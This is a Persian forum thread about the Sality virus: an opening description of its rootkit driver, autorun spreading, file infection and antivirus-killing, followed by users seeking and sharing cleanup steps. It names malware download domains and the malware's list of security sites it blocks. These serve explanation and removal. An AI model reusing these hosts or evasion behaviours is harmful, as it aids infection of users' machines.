19-05-2009, 19:25
ویروس خطرناک سالیتی win32.Sality Virus

این ویروس در چند ماه گذشته جزء شایع ترین ویروسها بوده است و انواع مختلفی دارد .


غیرفعال کردن Alt+Ctrl+Delete یا همان تسک منیجر Task Manager ، از کار افتادن Regedit ( رجیستری ویندوز) ،همچنین محدود کردن دسترسی به سایتهای آنتی ویروس ، بستن آنتی ویروس و همچنین خراب کردن فایلهای اجرایی سیستم مختصری از اعمال این ویروس است .


من در این مبحث به عملکرد کلی این ویروس میپردازم و در ادامه روشی برای حذف این ویروس آموزش داده ام.


عناوین این ویروس و اسامی مورد شناسایی انتی ویروسهای معروف را در این صفحه مشاهده نمایید :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



شیوه آلوده سازی ویرس Sality


این ویروس پس از اجرا ، فایل آلوده ای را با نامی تصادفی و پسوند SYS در مسیر زیر قرار می دهد :

%System%\drivers

این کامپوننت آلوده ، در واقع یک Device Driver میباشد که مانند یک rootkit در سطح کرنل سیستم عمل می کند و به ویروس اجازه می دهد که خودش و عملکردش را در سیستم مخفی کند . از آنجایی که این شیوه تنها در سیستمهای مبتنی بر ویندوز ان تی (Windows NT-based operating systems) قابل اجراست .
لذا ویندوزهای NT/2000/XP/2003 در معرض آلودگی این ویروس هستند .

من در یکی از سیستمهای آلوده به این ویروس ، پراسسی به نام SCVHOST.exe را مشاهده کردم که در واقع پراسس اصلی ویروس بود .

توجه کنید که نام SCVHOST.exe بسیار شبیه فایل سیستمی SVCHOST.exe میباشد وتنها دو حرف C و V جابجا شده اند .

در واقع وجود یکی از پراسسهای زیر در سربرگ Processes ممکن است یکی از نشانه های آلودگی سیستم به ویروس Sality باشد :

blastclnnn.exe

hinhem.scr

SCVHOST.exe



این ویروس متن زیر را در فایل SYSTem.ini موجود در شاخه ویندوز اضافه می کند :



[MCIDRV_VER]
DEVICEMB=

که منظور از random number یک عدد تصادفی است .

همچنین کلید رجیستری زیر را در رجیستری ویندوز ایجاد می کند که ترکیبی است از نام کامپیوتر و یک عدد سه رقمی تصادفی :

HKCU\Software\<3 random numbers>

مثلا :

HKCU\Software\EliassMaleki498

در این کلید ویروس متغیرهای مورد استفاده خود را ایجاد می کند .

در یکی از سیستمهای آلوده من مسیر رجیستری زیر را که توسط ویروس ایجاد شده بود یافتم :

HKCU\Software\ACS-IR914

که ACS-IR نام کامپیوتر و عدد 914 همان عدد سه رقمی تصادفی بود.


این ویروس همچنین کلیه درایوهای محلی و یا شبکه ای و یا قابل حمل مانند فلش دیسکهای متصل به سیستم را یافته و خود را در آنها کپی می کند .

این ویروس همانند بسیاری از ویروسهای جدید با استفاده از ایجاد فایل Autorun.inf در درایوها و حافظه های فلش از این روش برای تکثیر خود بهره میگیرد .

وجود فایل Autorun.inf در هر نوع درایوی موجب می شود به محض دابل کلیک کردن بر روی درایو دستورات موجود در Autorun.inf اجرا شود که این دستورات ، دستوراتی شامل اجرای مجدد ویروس و تکثیر مجدد در کلیه درایوهاست .


بارگذاری ویروسها و بدافزارهای دیگر :



این ویروس با اتصال به دامینها و سایتهای زیر ، بدافزارهای دیگری را نیز دانلود کرده و به سیستم آلوده منتقل می کند :



89.119.67.154
bjerm.mass.hc.ru
klkjwre77638dfqwieuoi888.info
kukutrustnet777.info
kukutrustnet777888.info
kukutrustnet888.info
kukutrustnet987.info
lpbmx.ru
mattfoll.eu.interia.pl
st1.dist.su.lt
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])





غیر فعال کردن Task Manager و Registry Editor و Show Hidden Files



این ویروس ضمن از کار انداختن تسک منیجر Task Manager یا همان Alt+Ctrl+Delete موجب از کار افتادن ویرایشگر رجیستری (Regedit) نیز میگردد .

در صورت آلوده شدن سیستم به تین ویروس Folder Option نیز در مواقعی حذف می شود و یا در صورت وجود ، عملکرد نمایش فایهای مخفی و سیستمی نیز غیرفعال میگردد .

( در واقع وقتی شما گزینه

Show hidden files and folders
Hide extensions for known file types

را انتخاب میکنید و همچنین گزینه

Hide protected operating system files (Recommended)

را علامتدار می کنید باز فایهای سیستمی و مخفی نمایش نمی یابد )

در یکی از نسخه ها با جرای دستور بازگرداندن تسک منیجر بای چند لحظه تسک منیجر کار می کند ولی بسرعت غیر فعال میگردد .



بالا نیامدن سیستم در حالت Safe Mode



این ویروس موجب می شود سیستم در حالت سیف مود (Safe Mode) نیز بالا نیاید و پس از چند لحظه ری استارت شود !



تخریب و آلوده کردن فایلهای SCR و EXE


از بدترین اعمالی که این ویروس انجام می دهد خراب کردن فایلهای اجرایی سیستم با پسوند exe و SCR میباشد بطوریکه اغلب فایلهای exe و SCR موجود در درایو C را آلوده کردن و کدهایی را در آنها تزریق می کند و در نتیجه فایهای فوق نیز بعنوان ویروس Sality شناخته می شوند و بکلی خراب می شوند .

همچنین بسیاری از فایلهای اجرایی درایوهای دیگر را بطور تصادفی آلوده می کند .

حذف فایلها و بستن پراسسهای خاص:



این ویروس همچنین ممکن است فایلهای با پسوندهای زیر را حذف کند :

*.AVC

*.VDB



جالب اینجاست این ویروس به شما اجازه نصب برنامه های آنتی ویروس را می دهد اما به محض اجرای آنتی ویروس آن را می بندد ! من از کسپرسکی استفاده کردم که پس از اجرای کسپرسی پس از حدود 2 ثانیه انتی ویروس توسط ویروس فوق بسته می شود !

این ویروس فایلها یا پراسسهایی که اسامی آنها دارای کلمات زیر میباشد را حذف کرده و یا می بندد (Terminate and Delete the Process )



لیست این کلمات را در این صفحه میتوانید مشاهده کنید.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



خاتمه اجرای سرویسهای خاصی در ویندوز


Terminates Services

این ویروس سرویسهای در حال اجرای سیستم را که به نامهای زیر هستند را خاتمه می دهد :

لیست این پراسسها را در اینجا ببینید .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


جلوگیری از دسترسی و اتصال به وب سایتهای خاص :

این ویروس دسترسی سیستم را به سایتهای اینترنتی خاصی را محدود می کند . این عمل را از طریق الحاق یک فایل SYS که وظیفه انجام IP Traffic Filter Device Driver را دارد ، انجام می دهد .

لذا کلیه سایتها و دامینتهایی که اسامی آنها دارای کلمات زیر میباشد بلوکه شده و دسترسی سیستم آلوده به آنها محدود میگردد


upload_virus
sality-remov
virusinfo.
cureit.
drweb.
onlinescan.
spywareinfo.
ewido.
virusscan.
windowsecurity.
spywareguide.
bitdefender.
pandasoftware.
agnmitum.
virustotal.
sophos.
trendmicro.
etrust.com
symantec.
mcafee.
f-secure.
eset.com
kaspersky

نکته قابل توجه : ممکن است سیستمی آلوده به این ویروس باشد اما با توجه به چند ریختی بودن ویروس ، اسامی بعضی از فایلها و یا مسیرهای ذکر شده متفاوت باشد اما بسیاری از عملکردها ، مانند از کارفتادن تسک منیجر و رجیستری در کلیه نسخه های این ویروس مشترک است .

منبع : wordship




ویروس من هم دقیقا همینه .
آواست در هنگام بالا آمدن سیستم این فایل رو دوبار شناسایی میکنه که بعد از پاک کردن دومین بار دیگه خبری نمیشه .

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
همچنین آواست در اتصال به اینترنت هر از چند مدتی یه فایل exe از temp پیدا میکنه که میزنم پاکشون میکنه .
بعد از بالا اومدن سیستم هم میخاد آواست رو end task کنه که نمیتونه .

حالا کسی نمیدونه اینو چه جوری باید پاکش کنیم ؟؟؟ یا باید ویندو از نو ویندوز از نو :دی

picher_s
20-05-2009, 07:16
ویروس من هم دقیقا همینه .
آواست در هنگام بالا آمدن سیستم این فایل رو دوبار شناسایی میکنه که بعد از پاک کردن دومین بار دیگه خبری نمیشه .

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدهمچنین آواست در اتصال به اینترنت هر از چند مدتی یه فایل exe از temp پیدا میکنه که میزنم پاکشون میکنه .
بعد از بالا اومدن سیستم هم میخاد آواست رو end task کنه که نمیتونه .

حالا کسی نمیدونه اینو چه جوری باید پاکش کنیم ؟؟؟ یا باید ویندو از نو ویندوز از نو :دی

سلام

برید به پسته 1 از تاپیک زیر ویروس sality (سالیتی) و روش پاک کردن آن (Remove Sality)


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

موفق باشید.

wordship
20-05-2009, 17:57
انتی ویروس اویرا به راحتی سالیتی را از بین می برد البته باید اپدیت شود[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

sargeras
22-05-2009, 14:11
سلام
من یه ویروس گرفتم که فولدرهایی که چند بار باز میکنم رو تبدیل به EXE میکنه ودیگه باز نمیشن!!!
حالا نمیدونم چه کار کردم که ویروسه از کار افتاده ولی فایل هایی که EXE کرده بود(و الان درست شدن) Hidden شدن و تیک Hidden هم غیر فعال شده و برداشته نمیشه!!!
حالا چیکار کنم تا تیک Hidden برداشته بشه ؟

sargeras
24-05-2009, 11:19
سلام
من یه ویروس گرفتم که فولدرهایی که چند بار باز میکنم رو تبدیل به EXE میکنه ودیگه باز نمیشن!!!
حالا نمیدونم چه کار کردم که ویروسه از کار افتاده ولی فایل هایی که EXE کرده بود(و الان درست شدن) Hidden شدن و تیک Hidden هم غیر فعال شده و برداشته نمیشه!!!
حالا چیکار کنم تا تیک Hidden برداشته بشه ؟
کسی نبود جواب ما رابده ؟؟!!؟

khelane
24-05-2009, 19:16
سلام دوستان لطفا" کمکم کنید
اخیرا" سیستمم ویروسی شده یا نشده نمیدونم ولی سرعت سیستمم اومده پاینن و اخطار generic host هم دارم یه عکس از تسک منیجر براتون میزارم لطفا" کمکم کنید از انتی ویروس اویرا به همراه جدید ترین اپدیت دارم نمیدونم مشکلم چیه
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

kral_pontiac
25-05-2009, 14:05
کسی نبود جواب ما رابده ؟؟!!؟

به این مسیر بروید :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
و در آنجا cmd را تایپ کنید .
حال دستور زیر را برای هر درایوی که این بلا سرش اومده اجرا کن .

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

توجه کنید که به جای حرف x در دستور بالا نام درایو مورد نظر را تایپ کنید .
با این دستور همه بلاهایی که ویروسه سر فولدرهات آورده رفع میشه .

p30girl
27-05-2009, 10:58
:41::19:با سلام
روی سیستم من kazme _ghaze هست .از روش هایی که گفتید هم رفتم.فایده نداره.حالت سیف مود رو از کار میندازه. از این روش هام دیلیت نمیشه
دوباره میاد.ویندوز عوض کردم بدون کلیک کردن آنتی ویروس نود 32 گذاشتم آپدیت کردم ولی بازم از کار افتاده.الان یک ماهه دارم روش های مختلف رو انجام می دم فایده نداره.این فایل هایی هم که میذارین اونو پاک می کنه ولی ویندوزم از پایه داغون می کنه و به شکل عجیبی در میاره!
دیگه نمیدونم راه جدیدی نیست؟

hoyal
27-05-2009, 11:14
مشکل :
پیغام task manager has been disabled by your administrator هنگام زدن دکمه های CTRL + ALT + DEL

راه حل :
این مسیر را طی کنید:

a. Go to "Start" -> "Run" -> Write "Gpedit.msc" and press on "Enter" button.

b. Navigate to "User Configuration" -> "Administrative Templates" -> "System" -> "Ctrl+Alt+Del Options"

c. In the right side of the screen verity that "Remove Task Manager"" option set to "Disable" or "Not Configured".

d. Close "Gpedit.msc" MMC.

e. Go to "Start" -> "Run" -> Write "gpupdate /force" and press on "Enter" button.




مشکل :
پیغام registry editing has been disabled by your administrator هنگام اجرای دستور regedit

راه حل :



روش اول :
Click Start -> Run -> gpedit.msc -> User Configuration -> Administrative Templates -> System -> Prevent access to registry editing tools -> Right Click Properties -> Set it to "Disable" or Not Configured.


روش دوم :
Click Start -> Run. Type this commands in Run box and press Ok.
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableRegistryTools /t REG_DWORD /d 0
Then a prompt will come up with this question: Value DisableRegistryTools exists, overwrite (Y/N)? Type yes and hit Enter.
After u did that also type this command in the run box and hit enter.
REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableRegistryTools /t REG_DWORD /d 0
Then it will also come up with the question: Value DisableRegistryTools exists, overwrite (Y/N)? Type yes and hit Enter.

.DaRyA.
28-05-2009, 16:42
سلام به همه بروبچز

مدتیه که وقتی فلش یا موبایلمو به کامپیوترم وصل میکنم یه پیغام ارور میده تحت عنوان iexplore.exe و میگه :

there is no disk in the drive . please insert a disk into drive \device\harddisk1\dr7


حتی وقتی فلش رو در میارم هم همین ارور رو میده


ممنون میشم کمکم کنین

مرسی :11:

.DaRyA.
28-05-2009, 16:51
سلام به همه بروبچز

مدتیه که وقتی فلش یا موبایلمو به کامپیوترم وصل میکنم یه پیغام ارور میده تحت عنوان iexplore.exe و میگه :

there is no disk in the drive . please insert a disk into drive \device\harddisk1\dr7


حتی وقتی فلش رو در میارم هم همین ارور رو میده


ممنون میشم کمکم کنین

مرسی :11:

sargeras
29-05-2009, 19:42
به این مسیر بروید :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
و در آنجا cmd را تایپ کنید .
حال دستور زیر را برای هر درایوی که این بلا سرش اومده اجرا کن .

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

توجه کنید که به جای حرف x در دستور بالا نام درایو مورد نظر را تایپ کنید .
با این دستور همه بلاهایی که ویروسه سر فولدرهات آورده رفع میشه .
ما که هرچی این دستور رو زدیم میگه همچین دستوری تو CMD وجود نداره :2:

picher_s
02-06-2009, 08:46
ما که هرچی این دستور رو زدیم میگه همچین دستوری تو CMD وجود نداره :2:

سلام

شما attrib.exe رو امتحان کن.

یا از مسیر زیر فایل رو بردار و اجرا کن


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

موفق باشید.

mohsen250
02-06-2009, 14:36
سیستم من ویروسی گرفته که تمام فایلهای exe رو مثل فایلهای مدیا باز می کنه. آنتی ویروس هم از کار افتاده.الان هیچ فایل exe رو نمی تونم اجرا کنم.چکار کنم

n.s
02-06-2009, 21:25
سلام.
سیستم منم ویروس گرفته:13:
تیک show hidden ... رو که میزنی بعدش بر میگرده به حالت قبلی یعنی do not show ...
چندتا مشکل دیگه هم بود که با nod32 حل شد ...(تو task manager تب process خالی بود،یعنی هیچی نشون نمیداد ...و محتویات system32 هم دیده نمیشد )
nod 32 اینو پیدا میکنه ....win32.autorun.da worm
بقیه فایل ها هم که hide هستن ..یه desktop.ini هم هست !!!
تمام اون راه ها رو امتحان کردم نشد که نشد ...:41:
ممنون میشم راهنمایی کنید !!!

officer
03-06-2009, 11:17
سلام....مثل اينكه اين ويروس غير فعال كننده show hidden file همه گير شده :31:

منم همين مشكلو دارم...يكي راهنمايي كنه.

ضمنا يكي لطف كنه بگه اين مشكل باز شدن پنجره open with بعد از 2 بار كليك روي درايو ها رو چطوري حل كنم ؟

با تشكر:40::11:

Ghaioom
03-06-2009, 11:41
سلام....مثل اينكه اين ويروس غير فعال كننده show hidden file همه گير شده :31:

منم همين مشكلو دارم...يكي راهنمايي كنه.

ضمنا يكي لطف كنه بگه اين مشكل باز شدن پنجره open with بعد از 2 بار كليك روي درايو ها رو چطوري حل كنم ؟

با تشكر:40::11:
یه نگاهی به پست اول مینداختید :31:

حل مشکل open with

اگر بر روی هر درایو کلیک می کنید پنجره open with باز می شود به دلیل پاک شدن فایلی می باشد که مسئول باز کردن درایو می باشد .
شما می توانید از برنامه زیر برای حل این مشکل استفاده کنید . البته قبل از ان باید ویروس autoran را از درایو های خودتون پاک کرده باشید . بعد از اجرا کردن برنامه باید چند دقیقه منتظر باشید تا برنامه کار خود را انجام دهد . بعد از اینکه کارش به اتمام رسید به شما پیغام می دهد . پس صبور باشید .



[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


گاهی اوقات نیز وقتی بر روی هر برنامه ای که دارای پسوند exe می باشد کلیک می کنید پنجره open with باز می شود برای حل این مشکل هم باید از برنامه زیر استفاده کید .



[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


اینم امتحان کنید.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

officer
03-06-2009, 12:19
حل مشکل open with

اگر بر روی هر درایو کلیک می کنید پنجره open with باز می شود به دلیل پاک شدن فایلی می باشد که مسئول باز کردن درایو می باشد .
شما می توانید از برنامه زیر برای حل این مشکل استفاده کنید . البته قبل از ان باید ویروس autoran را از درایو های خودتون پاک کرده باشید . بعد از اجرا کردن برنامه باید چند دقیقه منتظر باشید تا برنامه کار خود را انجام دهد . بعد از اینکه کارش به اتمام رسید به شما پیغام می دهد . پس صبور باشید .



[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



اين لينك not found ميده...

ميشه يه لطفي كنيد بگين من بايد به ترتيب چيكار كنم...نه درايو هام باز ميشن نه فايل هاي مخفي رو ميشه

show كرد.. :31:

Ghaioom
03-06-2009, 12:34
اين لينك not found ميده...

ميشه يه لطفي كنيد بگين من بايد به ترتيب چيكار كنم...نه درايو هام باز ميشن نه فايل هاي مخفي رو ميشه

show كرد.. :31:
سلام
من که خودم آنتی هستم اتوران رو دستی پاک میکردم با سرچ تو ویندوز اسمشو میزدم بعد سرچ میکردم بعد میپاکیدمش:27: یا آنتی یوروس NOD32 همه کارو میکنه آپدیت شده باشه چه بهتر :31:
بیا

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

new evil
04-06-2009, 10:48
سلامكامپيوترم به ويروس autorun.inf الوده شده!!folder option رو ندارمتسك منيجر هم نمياد رجيستري هم همينطور پست اول رو خوندم ولي چون فولدر اپشن ندارم نميتونم تيك هيدن فايلز رو بردارم از NOD 32 هم استفاده كردم 11 تا از همين ويروس پيدا كرد پاكشون كردم ولي بازم تغييري نكرد لطف كنيد كمك كنيدبا پارتيشن بندي كامل حل ميشه يا ميشه بدون فرمت ويروس رو از بين برد؟؟؟

wordship
04-06-2009, 12:07
برای برگرداندن folderoptionاسان ترین راه این است که وارد منوی استارت شده و گزینهrunرا انتخاب کنیدو در ان تایپ کنید regedit وok کنید در بالای صفحه ی ظاهر شده گزینه editرازده و در قسمت findبنویسیدnofolderoptinدر سمت راست صفحه ای باز می شود گزینه سوم را انتخاب کرده و در ان مقدار عدد را به صفر تغییر دهید کامپیوتر را رستارت کرده


حالا folder option ظاهر شده است

wordship
04-06-2009, 12:10
این هم روشی برای کسانی که می خواهند به سرعت به فایلهای مخفی خودشون دسترسی پیدا کنند.
برای این کار کافی است دستورات زیر را داخل Notepad کپی کنید و بعد ان رابا نام و پسوند new.bat ذخیره کنید و بعد ان را اجرا کنید . چند لحظهمنتظر بمانید تا فایلهای مخفی نمایان شوند .
تذکر : با این روش فایلهای سوپر هایدن نیز قابل روئیت خواهند بود .

<!--[if !supportLineBreakNewLine]-->
<!--[endif]-->
کد:
attrib -s -h C:\*.* /s /d
attrib -s -h d:\*.* /s /d
attrib -s -h E:\*.* /s /d
attrib -s -h f:\*.* /s /d
attrib -s -h g:\*.* /s /d
attrib -s -h h:\*.* /s /d

Hammer
04-06-2009, 12:42
این هم روشی برای کسانی که می خواهند به سرعت به فایلهای مخفی خودشون دسترسی پیدا کنند.
برای این کار کافی است دستورات زیر را داخل Notepad کپی کنید و بعد ان رابا نام و پسوند new.bat ذخیره کنید و بعد ان را اجرا کنید . چند لحظهمنتظر بمانید تا فایلهای مخفی نمایان شوند .
تذکر : با این روش فایلهای سوپر هایدن نیز قابل روئیت خواهند بود .

<!--[if !supportLineBreakNewLine]-->
<!--[endif]-->
کد:
attrib -s -h C:\*.* /s /d
attrib -s -h d:\*.* /s /d
attrib -s -h E:\*.* /s /d
attrib -s -h f:\*.* /s /d
attrib -s -h g:\*.* /s /d
attrib -s -h h:\*.* /s /d

خیلی ممنون . واسه اینکه از Redonly هم در بیاریم میشه همین کارو کرد . فقط جای -h بزنید r-
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

zombie
05-06-2009, 12:57
سلام

من گرفتار ویروسی شدم که سرعت هاردم رو شدیدا پایین آورده. وقتی می خوام از درایوی به درایو دیگه یه فایل 10 مگی رو کپی کنم 20 دقیقه طول می کشه. اینستال کردن یه دی وی دی که برو تا 1 ساعت و خورده ای. ویندوز هم تا بخواد بیاد بالا 10 دقیقه طول می کشه.

در ضمن وقتی تو صفحه ای هستم یهو از اون صفحه می آد بیرون. انگار که ALT+ Esc زده باشی.

لطفا کمکم کنید بگید چیکار کنم؟؟
آنتی ویروسم هم مک آفیه.آپدیتش هم کردم ولی چیزی پیدا نکرد.

!hamed joon
07-06-2009, 14:04
از بين بردن ويروس Autorun.inf
براي از بين بردن اين ويروس از طريق safe mode وارد شويد براي اين منظور سيستم را ريستارت كرده وكليد F8 را نگه داريد سپس گذينه safe mode را انتخاب كنيد وقتي وارد ويندوز شديد بدون اين كه روي درايوها كليك كنيد بالاي صفحه My Computer در قسمت Address نام درايوها را نوشته مثلا C:\ سپس وارد درايو شده فايل Autorun.inf و Autoply.exe را پاك كنيد اين كار را براي تمام درايوها انجام دهيد حتي اگر فلش مموري هم داريد كه حاوي اين ويروس است بر روي آن هم انجام دهيد حالا سيستم را ريستارت كرده و وارد ويندوز شويد ميبينيد كه هيچ اثري از اين ويروس نيست اين روش را خودم امتحان كردم و جواب داد . :20:

wordship
07-06-2009, 15:37
DONLOAD AVK , GDATA INTERNET SECURITY 2009

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
DOWNLOAD NOD32 V.4

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
HAMASHOON 2009 HASTAN

mostafabad2007
07-06-2009, 17:13
در پست های بالا طرز از بین بردن Autorun.inf اینو گفتید ایا روشی هم وجود داره که بشه ویروسه eyt.exe ار بین برد

!hamed joon
09-06-2009, 16:29
تا به حال اسم چنين ويروسي eyt.exe به گوشم نخورده

M_E_H_D_I
10-06-2009, 09:41
براي من هم ويروسي به نام p.exe به همراه آتوران هست .

چطور از دست اين ويروس خلاص بشم.
جالب اينجاست كه هارد را پارتيشن بندي كردم و ويندوز جديد نصب كردم كه اين ويروس بوده و بعضي مواقع باعث كندي سيستم و هنگ كردن آن مي شود. بطوري كه حتي مواقعي كه كامپيوتر روشن ميكنم و logon ميشه در همون ابتدا بدون هيچ كاري هنگ كرده!!!!!

picher_s
10-06-2009, 10:53
براي من هم ويروسي به نام p.exe به همراه آتوران هست .

چطور از دست اين ويروس خلاص بشم.
